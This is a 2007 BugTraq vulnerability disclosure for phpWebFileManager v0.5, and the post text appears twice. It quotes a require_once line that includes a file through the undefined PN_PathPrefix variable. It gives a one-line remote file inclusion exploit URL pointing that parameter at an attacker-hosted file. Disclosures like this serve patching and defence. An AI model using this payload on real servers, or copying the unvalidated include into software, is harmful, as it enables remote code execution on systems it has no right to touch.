BugTraq
Back to list
|
Post reply
phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
Jul 30 2007 07:10PM
ilkerkandemir mynet com
------------------------------------------------------------------------
-------------------------------------------
MEFISTO PreSents...
Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once $PN_PathPrefix . 'functions.inc.php'; <<==== it's not defined
------------------------------------------------------------------------
-------------------------------------------
Exploit: index.php?PN_PathPrefix=http://attacker.txt?
------------------------------------------------------------------------
-------------------------------------------
Tnx:H0tturk,Ajann,Dumenci,Str0ke
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
-------------------------------------------
MEFISTO PreSents...
Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once $PN_PathPrefix . 'functions.inc.php'; <<==== it's not defined
------------------------------------------------------------------------
-------------------------------------------
Exploit: index.php?PN_PathPrefix=http://attacker.txt?
------------------------------------------------------------------------
-------------------------------------------
Tnx:H0tturk,Ajann,Dumenci,Str0ke
[ reply ]